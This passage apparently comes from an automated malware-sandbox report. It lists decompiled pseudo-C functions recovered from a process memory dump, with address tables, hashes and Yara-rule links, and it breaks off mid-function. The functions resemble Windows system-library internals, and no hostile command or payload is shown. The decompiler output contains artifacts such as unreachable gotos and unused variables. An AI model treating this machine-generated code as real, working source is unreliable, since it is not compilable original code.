				_push( *_t21 & 0x000000ff);
				return E0497B640(E04979AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}
















                                                                  0x049cfe96
                                                                  0x049cfe9e
                                                                  0x049cfea1
                                                                  0x049cfead
                                                                  0x049cfeb3
                                                                  0x049cfeb9
                                                                  0x049cfec3
                                                                  0x049cfed5
                                                                  0x049cfec5
                                                                  0x049cfece
                                                                  0x049cfece
                                                                  0x049cfee0
                                                                  0x049cfee1
                                                                  0x049cfee3
                                                                  0x049cfee8
                                                                  0x049cfefb

                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.593272688.0000000004910000.00000040.00000001.sdmp, Offset: 04910000, based on PE: true
                                                                  • Associated: 0000000A.00000002.593706758.0000000004A2B000.00000040.00000001.sdmp Download File
                                                                  • Associated: 0000000A.00000002.593735317.0000000004A2F000.00000040.00000001.sdmp Download File
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: efa363a171cfde19ac3be1c393bdf0dbdaf1ecb2c421948ca86cbf64b8a5a098
                                                                  • Instruction ID: dc1c17666b595f0937a1cca36f5f297581ef99923c4181c0dd0378b68395b3b6
                                                                  • Opcode Fuzzy Hash: efa363a171cfde19ac3be1c393bdf0dbdaf1ecb2c421948ca86cbf64b8a5a098
                                                                  • Instruction Fuzzy Hash: 28018670A0020CEFDB14DFA8D546A6EB7F4FF04704F1041A9B904DB382D635EA01CB81
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 049F131B, Relevance: .0, Instructions: 36COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 48%
                                                                  			E049F131B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				short _v50;
				char _v56;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_v8 =  *0x4a2d360 ^ _t32;
				_v20 = _a4;
				_v12 = _a8;
				_v24 = __ecx;
				_v16 = __edx;
				_v50 = 0x1021;
				if(E04957D50() == 0) {
					_t18 = 0x7ffe0380;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				_push( &_v56);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E0497B640(E04979AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
			}















                                                                  0x049f131b
                                                                  0x049f132a
                                                                  0x049f1330
                                                                  0x049f1336
                                                                  0x049f133e
                                                                  0x049f1341
                                                                  0x049f1344
                                                                  0x049f134f
                                                                  0x049f1361
                                                                  0x049f1351
                                                                  0x049f135a
                                                                  0x049f135a
                                                                  0x049f136c
                                                                  0x049f136d
                                                                  0x049f136f
                                                                  0x049f1374
                                                                  0x049f1387

                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.593272688.0000000004910000.00000040.00000001.sdmp, Offset: 04910000, based on PE: true
                                                                  • Associated: 0000000A.00000002.593706758.0000000004A2B000.00000040.00000001.sdmp Download File
                                                                  • Associated: 0000000A.00000002.593735317.0000000004A2F000.00000040.00000001.sdmp Download File
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 8901259793966afe717778df16700610f481da609948449cc19d79f761c24ab9
                                                                  • Instruction ID: 7bd1814c3f529c4295741eb5b8addfe7b6debc83282645f0b394b77f6b592350
                                                                  • Opcode Fuzzy Hash: 8901259793966afe717778df16700610f481da609948449cc19d79f761c24ab9
                                                                  • Instruction Fuzzy Hash: 86013171A01208AFDB04EFA9D545AAEB7F4FF48704F104069B945EB351E674AA00CB94
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 04A08F6A, Relevance: .0, Instructions: 36COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 48%
                                                                  			E04A08F6A(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				short _v50;
				char _v56;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_v8 =  *0x4a2d360 ^ _t32;
				_v16 = __ecx;
				_v50 = 0x1c2c;
				_v24 = _a4;
				_v20 = _a8;
				_v12 = __edx;
				if(E04957D50() == 0) {
					_t18 = 0x7ffe0386;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v56);
				_push(0x10);
				_push(0x402);
				_push( *_t18 & 0x000000ff);
				return E0497B640(E04979AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
			}















                                                                  0x04a08f6a
                                                                  0x04a08f79
                                                                  0x04a08f81
                                                                  0x04a08f84
                                                                  0x04a08f8b
                                                                  0x04a08f91
                                                                  0x04a08f94
                                                                  0x04a08f9e
                                                                  0x04a08fb0
                                                                  0x04a08fa0
                                                                  0x04a08fa9
                                                                  0x04a08fa9
                                                                  0x04a08fbb
                                                                  0x04a08fbc
                                                                  0x04a08fbe
                                                                  0x04a08fc3
                                                                  0x04a08fd6

                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.593272688.0000000004910000.00000040.00000001.sdmp, Offset: 04910000, based on PE: true
                                                                  • Associated: 0000000A.00000002.593706758.0000000004A2B000.00000040.00000001.sdmp Download File
                                                                  • Associated: 0000000A.00000002.593735317.0000000004A2F000.00000040.00000001.sdmp Download File
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 76ed296c5ad40952646a92d116ee7d0af473310b5d14b923586b29810614cef1
                                                                  • Instruction ID: 035f5e229a1ee1ab3786e56391fbb307697d09874f3153dac5409d333c1b07cd
                                                                  • Opcode Fuzzy Hash: 76ed296c5ad40952646a92d116ee7d0af473310b5d14b923586b29810614cef1
                                                                  • Instruction Fuzzy Hash: 4D01F974A0120C9FD704EFB8D545AAEB7F4EF58704F504469B905EB391DA74EA00DB94
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 049F1608, Relevance: .0, Instructions: 34COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 46%
                                                                  			E049F1608(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				short _v46;
				char _v52;
				signed char* _t15;
				intOrPtr _t21;
				intOrPtr _t27;
				intOrPtr _t28;
				signed int _t29;

				_t26 = __edx;
				_v8 =  *0x4a2d360 ^ _t29;
				_v12 = _a4;
				_v20 = __ecx;
				_v16 = __edx;
				_v46 = 0x1024;
				if(E04957D50() == 0) {
					_t15 = 0x7ffe0380;
				} else {
					_t15 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				_push( &_v52);
				_push(0xc);
				_push(0x20402);
				_push( *_t15 & 0x000000ff);
				return E0497B640(E04979AE0(), _t21, _v8 ^ _t29, _t26, _t27, _t28);
			}














                                                                  0x049f1608
                                                                  0x049f1617
                                                                  0x049f161d
                                                                  0x049f1625
                                                                  0x049f1628
                                                                  0x049f162b
                                                                  0x049f1636
                                                                  0x049f1648
                                                                  0x049f1638
                                                                  0x049f1641
                                                                  0x049f1641
                                                                  0x049f1653
                                                                  0x049f1654
                                                                  0x049f1656
                                                                  0x049f165b
                                                                  0x049f166e

                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.593272688.0000000004910000.00000040.00000001.sdmp, Offset: 04910000, based on PE: true
                                                                  • Associated: 0000000A.00000002.593706758.0000000004A2B000.00000040.00000001.sdmp Download File
                                                                  • Associated: 0000000A.00000002.593735317.0000000004A2F000.00000040.00000001.sdmp Download File
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 183bbaa8d67beba86385ea5ac3ec0054e7ec8d9fa50cfa22983b9d3e92089dea
                                                                  • Instruction ID: 91ebe0f000866a6550e72fa8ddcd009aa66fd2bb16213cac65d832e19e51ad56
                                                                  • Opcode Fuzzy Hash: 183bbaa8d67beba86385ea5ac3ec0054e7ec8d9fa50cfa22983b9d3e92089dea
                                                                  • Instruction Fuzzy Hash: C7F06271E01248EFDB14EFE9D946AAEB7F4EF54300F144069A905EB391E634AE00CB94
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0495C577, Relevance: .0, Instructions: 33COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 100%
                                                                  			E0495C577(void* __ecx, char _a4) {
				void* __esi;
				void* __ebp;
				void* _t17;
				void* _t19;
				void* _t20;
				void* _t21;

				_t18 = __ecx;
				_t21 = __ecx;
				if(__ecx == 0 ||  *((char*)(__ecx + 0xdd)) != 0 || E0495C5D5(__ecx, _t19) == 0 ||  *((intOrPtr*)(__ecx + 4)) != 0x49111cc ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					__eflags = _a4;
					if(__eflags != 0) {
						L10:
						E04A088F5(_t17, _t18, _t19, _t20, _t21, __eflags);
						L9:
						return 0;
					}
					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
					if(__eflags == 0) {
						goto L10;
					}
					goto L9;
				} else {
					return 1;
				}
			}









                                                                  0x0495c577
                                                                  0x0495c57d
                                                                  0x0495c581
                                                                  0x0495c5b5
                                                                  0x0495c5b9
                                                                  0x0495c5ce
                                                                  0x0495c5ce
                                                                  0x0495c5ca
                                                                  0x00000000
                                                                  0x0495c5ca
                                                                  0x0495c5c4
                                                                  0x0495c5c8
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x0495c5ad
                                                                  0x00000000
                                                                  0x0495c5af

                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.593272688.0000000004910000.00000040.00000001.sdmp, Offset: 04910000, based on PE: true
                                                                  • Associated: 0000000A.00000002.593706758.0000000004A2B000.00000040.00000001.sdmp Download File
                                                                  • Associated: 0000000A.00000002.593735317.0000000004A2F000.00000040.00000001.sdmp Download File
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 5b9aa3521bb6ffe0674d213120139730f80de109deb316142c7fc7ba15a8c4f1
                                                                  • Instruction ID: 4abd8928e1d2bdf81c57029c68b1d89e51e62c8a01f31b296c8d43e87620b547
                                                                  • Opcode Fuzzy Hash: 5b9aa3521bb6ffe0674d213120139730f80de109deb316142c7fc7ba15a8c4f1
                                                                  • Instruction Fuzzy Hash: 1FF090B291D7949EE731DB948044B227BDC9B05778F648876DC1687171C6A4F882C351
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 049F2073, Relevance: .0, Instructions: 32COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 94%
                                                                  			E049F2073(void* __ebx, void* __ecx, void* __edi, void* __eflags) {
				void* __esi;
				signed char _t3;
				signed char _t7;
				void* _t19;

				_t17 = __ecx;
				_t3 = E049EFD22(__ecx);
				_t19 =  *0x4a2849c - _t3; // 0x0
				if(_t19 == 0) {
					__eflags = _t17 -  *0x4a28748; // 0x0
					if(__eflags <= 0) {
						E049F1C06();
						_t3 =  *((intOrPtr*)( *[fs:0x30] + 2));
						__eflags = _t3;
						if(_t3 != 0) {
							L5:
							__eflags =  *0x4a28724 & 0x00000004;
							if(( *0x4a28724 & 0x00000004) == 0) {
								asm("int3");
								return _t3;
							}
						} else {
							_t3 =  *0x7ffe02d4 & 0x00000003;
							__eflags = _t3 - 3;
							if(_t3 == 3) {
								goto L5;
							}
						}
					}
					return _t3;
				} else {
					_t7 =  *0x4a28724; // 0x0
					return E049E8DF1(__ebx, 0xc0000374, 0x4a25890, __edi, __ecx,  !_t7 >> 0x00000002 & 0x00000001,  !_t7 >> 0x00000002 & 0x00000001);
				}
			}







                                                                  0x049f2076
                                                                  0x049f2078
                                                                  0x049f207d
                                                                  0x049f2083
                                                                  0x049f20a4
                                                                  0x049f20aa
                                                                  0x049f20ac
                                                                  0x049f20b7
                                                                  0x049f20ba
                                                                  0x049f20bc
                                                                  0x049f20c9
                                                                  0x049f20c9
                                                                  0x049f20d0
                                                                  0x049f20d2
                                                                  0x00000000
                                                                  0x049f20d2
                                                                  0x049f20be
                                                                  0x049f20c3
                                                                  0x049f20c5
                                                                  0x049f20c7
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x049f20c7
                                                                  0x049f20bc
                                                                  0x049f20d4
                                                                  0x049f2085
                                                                  0x049f2085
                                                                  0x049f20a3
                                                                  0x049f20a3

                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.593272688.0000000004910000.00000040.00000001.sdmp, Offset: 04910000, based on PE: true
                                                                  • Associated: 0000000A.00000002.593706758.0000000004A2B000.00000040.00000001.sdmp Download File
                                                                  • Associated: 0000000A.00000002.593735317.0000000004A2F000.00000040.00000001.sdmp Download File
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: f8232923c1261663631416f357fe62196bfeb0ca05d5b72feeb9e9cfa556433e
                                                                  • Instruction ID: 50b712c449fb351fc378c139321ac2433508e3daf8f90e983da6230fe1896788
                                                                  • Opcode Fuzzy Hash: f8232923c1261663631416f357fe62196bfeb0ca05d5b72feeb9e9cfa556433e
                                                                  • Instruction Fuzzy Hash: A5F027674112844BFF327F297A013F16B98D795114B4D04E9EE9017204C93FAC83EB10
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 04A08D34, Relevance: .0, Instructions: 32COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 43%
                                                                  			E04A08D34(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				short _v42;
				char _v48;
				signed char* _t12;
				intOrPtr _t18;
				intOrPtr _t24;
				intOrPtr _t25;
				signed int _t26;

				_t23 = __edx;
				_v8 =  *0x4a2d360 ^ _t26;
				_v16 = __ecx;
				_v42 = 0x1c2b;
				_v12 = __edx;
				if(E04957D50() == 0) {
					_t12 = 0x7ffe0386;
				} else {
					_t12 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v48);
				_push(8);
				_push(0x20402);
				_push( *_t12 & 0x000000ff);
				return E0497B640(E04979AE0(), _t18, _v8 ^ _t26, _t23, _t24, _t25);
			}













                                                                  0x04a08d34
                                                                  0x04a08d43
                                                                  0x04a08d4b
                                                                  0x04a08d4e
                                                                  0x04a08d52
                                                                  0x04a08d5c
                                                                  0x04a08d6e
                                                                  0x04a08d5e
                                                                  0x04a08d67
                                                                  0x04a08d67
                                                                  0x04a08d79
                                                                  0x04a08d7a
                                                                  0x04a08d7c
                                                                  0x04a08d81
                                                                  0x04a08d94

                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.593272688.0000000004910000.00000040.00000001.sdmp, Offset: 04910000, based on PE: true
                                                                  • Associated: 0000000A.00000002.593706758.0000000004A2B000.00000040.00000001.sdmp Download File
                                                                  • Associated: 0000000A.00000002.593735317.0000000004A2F000.00000040.00000001.sdmp Download File
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 3692c30a38dd85af8491ff02945764acb85f8ad864fd91d6712c745ec65be73d
                                                                  • Instruction ID: 274ac3636a9325a086c2c1f58964cb3bdfa4c49729be662680536c9bca60bd81
                                                                  • Opcode Fuzzy Hash: 3692c30a38dd85af8491ff02945764acb85f8ad864fd91d6712c745ec65be73d
                                                                  • Instruction Fuzzy Hash: A5F05470E046089FDB14EFB8D545A6E77B4EF54704F5080A9E905EB391EA38E900D754
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0497927A, Relevance: .0, Instructions: 32COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 54%
                                                                  			E0497927A(void* __ecx) {
				signed int _t11;
				void* _t14;

				_t11 = L04954620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x98);
				if(_t11 != 0) {
					E0497FA60(_t11, 0, 0x98);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *(_t11 + 0x1c) =  *(_t11 + 0x1c) & 0x00000000;
					 *((intOrPtr*)(_t11 + 0x24)) = 1;
					E049792C6(_t11, _t14);
				}
				return _t11;
			}





                                                                  0x04979295
                                                                  0x04979299
                                                                  0x0497929f
                                                                  0x049792aa
                                                                  0x049792ad
                                                                  0x049792ae
                                                                  0x049792af
                                                                  0x049792b0
                                                                  0x049792b4
                                                                  0x049792bb
                                                                  0x049792bb
                                                                  0x049792c5

                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.593272688.0000000004910000.00000040.00000001.sdmp, Offset: 04910000, based on PE: true
                                                                  • Associated: 0000000A.00000002.593706758.0000000004A2B000.00000040.00000001.sdmp Download File
                                                                  • Associated: 0000000A.00000002.593735317.0000000004A2F000.00000040.00000001.sdmp Download File
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
                                                                  • Instruction ID: 4c2557a844e30342e6822852e1e95a9541886f38bbdbfd108fa1876aa653cbf7
                                                                  • Opcode Fuzzy Hash: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
                                                                  • Instruction Fuzzy Hash: BEE02272340A006BF721AE0ACC80F0337ADEFC2724F004078FA001F282CAE6EC0887A0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 04A08CD6, Relevance: .0, Instructions: 31COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 36%
                                                                  			E04A08CD6(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v12;
				short _v38;
				char _v44;
				signed char* _t11;
				intOrPtr _t17;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				signed int _t25;

				_v8 =  *0x4a2d360 ^ _t25;
				_v12 = __ecx;
				_v38 = 0x1c2d;
				if(E04957D50() == 0) {
					_t11 = 0x7ffe0386;
				} else {
					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v44);
				_push(0xffffffe4);
				_push(0x402);
				_push( *_t11 & 0x000000ff);
				return E0497B640(E04979AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
			}













                                                                  0x04a08ce5
                                                                  0x04a08ced
                                                                  0x04a08cf0
                                                                  0x04a08cfb
                                                                  0x04a08d0d
                                                                  0x04a08cfd
                                                                  0x04a08d06
                                                                  0x04a08d06
                                                                  0x04a08d18
                                                                  0x04a08d19
                                                                  0x04a08d1b
                                                                  0x04a08d20
                                                                  0x04a08d33

                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.593272688.0000000004910000.00000040.00000001.sdmp, Offset: 04910000, based on PE: true
                                                                  • Associated: 0000000A.00000002.593706758.0000000004A2B000.00000040.00000001.sdmp Download File
                                                                  • Associated: 0000000A.00000002.593735317.0000000004A2F000.00000040.00000001.sdmp Download File
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: a9a77754e17a69360d01ac3f1aeb6e031909390d83b70fba05e8f89dd5ce3cf6
                                                                  • Instruction ID: c2d9a9e52c7b586c48d32abd8854903b60a594f5bdf8d3de96e8540f2d0fdba6
                                                                  • Opcode Fuzzy Hash: a9a77754e17a69360d01ac3f1aeb6e031909390d83b70fba05e8f89dd5ce3cf6
                                                                  • Instruction Fuzzy Hash: 37F08970A05108AFDB04EBE8E545E6E77B4EF54304F1041A9E915EB2D1EA38E900C758
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0495746D, Relevance: .0, Instructions: 31COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 88%
                                                                  			E0495746D(short* __ebx, void* __ecx, void* __edi, intOrPtr __esi) {
				signed int _t8;
				void* _t10;
				short* _t17;
				void* _t19;
				intOrPtr _t20;
				void* _t21;

				_t20 = __esi;
				_t19 = __edi;
				_t17 = __ebx;
				if( *((char*)(_t21 - 0x25)) != 0) {
					if(__ecx == 0) {
						E0494EB70(__ecx, 0x4a279a0);
					} else {
						asm("lock xadd [ecx], eax");
						if((_t8 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(__ecx + 4)));
							E049795D0();
							L049577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t21 - 0x50)));
							_t17 =  *((intOrPtr*)(_t21 - 0x2c));
							_t20 =  *((intOrPtr*)(_t21 - 0x3c));
						}
					}
					L10:
				}
				_t10 = _t19 + _t19;
				if(_t20 >= _t10) {
					if(_t19 != 0) {
						 *_t17 = 0;
						return 0;
					}
				}
				return _t10;
				goto L10;
			}









                                                                  0x0495746d
                                                                  0x0495746d
                                                                  0x0495746d
                                                                  0x04957471
                                                                  0x04957488
                                                                  0x0499f92d
                                                                  0x0495748e
                                                                  0x04957491
                                                                  0x04957495
                                                                  0x0499f937
                                                                  0x0499f93a
                                                                  0x0499f94e
                                                                  0x0499f953
                                                                  0x0499f956
                                                                  0x0499f956
                                                                  0x04957495
                                                                  0x00000000
                                                                  0x04957488
                                                                  0x04957473
                                                                  0x04957478
                                                                  0x0495747d
                                                                  0x04957481
                                                                  0x00000000
                                                                  0x04957481
                                                                  0x0495747d
                                                                  0x0495747a
                                                                  0x00000000

                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.593272688.0000000004910000.00000040.00000001.sdmp, Offset: 04910000, based on PE: true
                                                                  • Associated: 0000000A.00000002.593706758.0000000004A2B000.00000040.00000001.sdmp Download File
                                                                  • Associated: 0000000A.00000002.593735317.0000000004A2F000.00000040.00000001.sdmp Download File
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 272e13789679e33407df77a1c1b9600e2ba4ce8620baf01dd9b77d69be2297a3
                                                                  • Instruction ID: 99418678ff1a4ed0c262747f147e9a72bd54129015d97e0d759f65b7ba52b954
                                                                  • Opcode Fuzzy Hash: 272e13789679e33407df77a1c1b9600e2ba4ce8620baf01dd9b77d69be2297a3
                                                                  • Instruction Fuzzy Hash: EEF09A34A00244BADF01DEE8C840B79BBA7AF44358F240AB9DC51AB170F764BA028B85
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 04934F2E, Relevance: .0, Instructions: 31COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 100%
                                                                  			E04934F2E(void* __ecx, char _a4) {
				void* __esi;
				void* __ebp;
				void* _t17;
				void* _t19;
				void* _t20;
				void* _t21;

				_t18 = __ecx;
				_t21 = __ecx;
				if(__ecx == 0) {
					L6:
					__eflags = _a4;
					if(__eflags != 0) {
						L8:
						E04A088F5(_t17, _t18, _t19, _t20, _t21, __eflags);
						L9:
						return 0;
					}
					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
					if(__eflags != 0) {
						goto L9;
					}
					goto L8;
				}
				_t18 = __ecx + 0x30;
				if(E0495C5D5(__ecx + 0x30, _t19) == 0 ||  *((intOrPtr*)(__ecx + 0x34)) != 0x4911030 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					goto L6;
				} else {
					return 1;
				}
			}









                                                                  0x04934f2e
                                                                  0x04934f34
                                                                  0x04934f38
                                                                  0x04990b85
                                                                  0x04990b85
                                                                  0x04990b89
                                                                  0x04990b9a
                                                                  0x04990b9a
                                                                  0x04990b9f
                                                                  0x00000000
                                                                  0x04990b9f
                                                                  0x04990b94
                                                                  0x04990b98
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x04990b98
                                                                  0x04934f3e
                                                                  0x04934f48
                                                                  0x00000000
                                                                  0x04934f6e
                                                                  0x00000000
                                                                  0x04934f70

                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.593272688.0000000004910000.00000040.00000001.sdmp, Offset: 04910000, based on PE: true
                                                                  • Associated: 0000000A.00000002.593706758.0000000004A2B000.00000040.00000001.sdmp Download File
                                                                  • Associated: 0000000A.00000002.593735317.0000000004A2F000.00000040.00000001.sdmp Download File
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: c2d5ac38b9594c459e9dbba1d228a4ecf218b1adc08b8b6150e0f753fddea667
                                                                  • Instruction ID: 8a45f60212f19a4b92f9c5b3d4411d3a148fe5e23f044cefb79e12b8787604fe
                                                                  • Opcode Fuzzy Hash: c2d5ac38b9594c459e9dbba1d228a4ecf218b1adc08b8b6150e0f753fddea667
                                                                  • Instruction Fuzzy Hash: 38F0E2329257949FEF71DB1CC140B22B7ECAB047B8F054474D825C7921C724FC44C640
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 04A08B58, Relevance: .0, Instructions: 31COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 36%
                                                                  			E04A08B58(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v20;
				short _v46;
				char _v52;
				signed char* _t11;
				intOrPtr _t17;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				signed int _t25;

				_v8 =  *0x4a2d360 ^ _t25;
				_v20 = __ecx;
				_v46 = 0x1c26;
				if(E04957D50() == 0) {
					_t11 = 0x7ffe0386;
				} else {
					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v52);
				_push(4);
				_push(0x402);
				_push( *_t11 & 0x000000ff);
				return E0497B640(E04979AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
			}













                                                                  0x04a08b67
                                                                  0x04a08b6f
                                                                  0x04a08b72
                                                                  0x04a08b7d
                                                                  0x04a08b8f
                                                                  0x04a08b7f
                                                                  0x04a08b88
                                                                  0x04a08b88
                                                                  0x04a08b9a
                                                                  0x04a08b9b
                                                                  0x04a08b9d
                                                                  0x04a08ba2
                                                                  0x04a08bb5

                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.593272688.0000000004910000.00000040.00000001.sdmp, Offset: 04910000, based on PE: true
                                                                  • Associated: 0000000A.00000002.593706758.0000000004A2B000.00000040.00000001.sdmp Download File
                                                                  • Associated: 0000000A.00000002.593735317.0000000004A2F000.00000040.00000001.sdmp Download File
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 745228d01828dd80d62ddc28015d3fbbd55468aff5e05d9bc1f142648663fdde
                                                                  • Instruction ID: 0f09996b404b6b911c3b6d0476ad48e4c042e05533826de65b908a9dd0ec0c63
                                                                  • Opcode Fuzzy Hash: 745228d01828dd80d62ddc28015d3fbbd55468aff5e05d9bc1f142648663fdde
                                                                  • Instruction Fuzzy Hash: E3F089B0A042589BEB14EBA8D506E7E73B4EF44704F140469B905DB3D1EA34E900C798
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0496A44B, Relevance: .0, Instructions: 29COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 100%
                                                                  			E0496A44B(signed int __ecx) {
				intOrPtr _t13;
				signed int _t15;
				signed int* _t16;
				signed int* _t17;

				_t13 =  *0x4a27b9c; // 0x0
				_t15 = __ecx;
				_t16 = L04954620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13 + 0xc0000, 8 + __ecx * 4);
				if(_t16 == 0) {
					return 0;
				}
				 *_t16 = _t15;
				_t17 =  &(_t16[2]);
				E0497FA60(_t17, 0, _t15 << 2);
				return _t17;
			}







                                                                  0x0496a44b
                                                                  0x0496a453
                                                                  0x0496a472
                                                                  0x0496a476
                                                                  0x00000000
                                                                  0x0496a493
                                                                  0x0496a47a
                                                                  0x0496a47f
                                                                  0x0496a486
                                                                  0x00000000

                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.593272688.0000000004910000.00000040.00000001.sdmp, Offset: 04910000, based on PE: true
                                                                  • Associated: 0000000A.00000002.593706758.0000000004A2B000.00000040.00000001.sdmp Download File
                                                                  • Associated: 0000000A.00000002.593735317.0000000004A2F000.00000040.00000001.sdmp Download File
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 640372af07058e7e6bcced291feaa951613b8756334a1f629f1a7bc70daca07a
                                                                  • Instruction ID: 9be15240bad0ddb7bb79678672669f23815bd67292fd5044fd157c3b3d1c4890
                                                                  • Opcode Fuzzy Hash: 640372af07058e7e6bcced291feaa951613b8756334a1f629f1a7bc70daca07a
                                                                  • Instruction Fuzzy Hash: 10E09272A02421ABD2219A19AC00F66B39DDBE5655F194435E906D7214D628ED02C7E0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0493F358, Relevance: .0, Instructions: 28COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 79%
                                                                  			E0493F358(void* __ecx, signed int __edx) {
				char _v8;
				signed int _t9;
				void* _t20;

				_push(__ecx);
				_t9 = 2;
				_t20 = 0;
